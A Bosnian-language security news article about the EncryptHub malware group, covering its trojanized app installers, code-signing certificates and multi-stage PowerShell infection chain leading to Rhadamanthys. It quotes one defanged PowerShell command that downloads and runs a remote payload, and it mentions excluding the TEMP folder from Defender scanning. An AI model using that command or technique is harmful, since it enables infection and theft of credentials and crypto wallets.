Sofisticirana grupa cyber kriminalaca poznata kao EncryptHub uspješno je kompromitovala oko 600 organizacija kroz višestepenu kampanju malicioznog softvera.
Haker je iskoristio operativne sigurnosne greške, nehotice razotkrivši kritične elemente svoje infrastrukture, što je omogućilo istraživačima da mapiraju svoje taktike s neviđenom dubinom.
EncryptHub-ova kampanja koristi nekoliko slojeva PowerShell skripti za prikupljanje sistemskih podataka, eksfiltriranje vrijednih informacija, izvršavanje tehnika izbjegavanja i postavljanje kradljivaca informacija.
Primijećeno je da haker cilja korisnike popularnih aplikacija distribuišući trojanizirane verzije softvera kao što su QQ Talk, WeChat, Microsoft Visual Studio 2022 i Palo Alto Global Protect.
Ove lažne aplikacije su generisane između 25. novembra 2024. i 1. januara 2025. godine.
Ove aplikacije su potpisane certifikatima za potpisivanje koda kako bi izgledali legitimno, uključujući i onu registriranu na “HOA SEN HA NAM ONE MEMBER LIMITED LIABILITIES COMPANY” koja je u međuvremenu opozvana.
Od 4. februara 2025. grupa je počela da koristi novi sertifikat registrovan na “Encrypthub LLC”, dodatno demonstrirajući njihovu taktiku razvoja.
.webp)
Napadači su također iskoristili kanale za distribuciju trećih strana, uključujući uslugu plaćanja po instalaciji pod nazivom “LabInstalls” koja radi preko Telegram bota, omogućavajući im da prošire svoj doseg i automatiziraju raspoređivanje malicioznih sadržaja na žrtve koje ništa ne sumnjaju.
Istraživači kompanije Outpost24 KrakenLabs otkrili su da EncryptHub daje prioritet evidencijama kredencijala ukradenim od žrtava na temelju vlasništva nad kriptovalutama, povezanosti s korporativnom mrežom i prisutnosti VPN softvera, što ukazuje na sofisticirane metode ciljanja.
EncryptHub-ov razvojni lanac ubijanja
Višestepeni napad počinje izvršavanjem naredbe PowerShell koja preuzima korisni teret prve faze: “powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command “Invoke-RestMethod -Uri ‘hxxps://encrypthub[.]us/encryptkle’expression1/pay”h).
Ovaj početni teret odgovoran je za krađu osjetljivih podataka uključujući sesije razmjene poruka, kripto novčanike, menadžmenta lozinki i VPN sesije.
Druga faza uključuje runner.ps1, koji sadrži base64-kodirane MSC datoteke koje se dekodiraju, modifikuju i izvršavaju radi ugradnje malicioznih URL-ova.
Treća faza koristi HTML učitavač koji nalaže Windows Defender-u da isključi TEMP folder iz skeniranja i preuzima dodatne skripte.
Posljednja faza postavlja Rhadamanthys malware, dovršavajući lanac infekcije.
.webp)
EncryptHub-ov lanac ubijanja pokazuje napredovanje od početnog izvršenja kroz više faza do konačnog postavljanja korisnog opterećenja.
.webp)
Grupa također razvija “EncryptRAT”, komandno-kontrolnu ploču koja upravlja infekcijama i šalje udaljene komande, sugerišući da bi uskoro mogli komercijalizirati ovaj alat drugim hakerima.
.webp)
Organizacijama se savjetuje da implementiraju višeslojne sigurnosne strategije i kontinuirano praćenje radi zaštite od ove prijetnje koja se razvija.
Izvor: CyberSecurityNews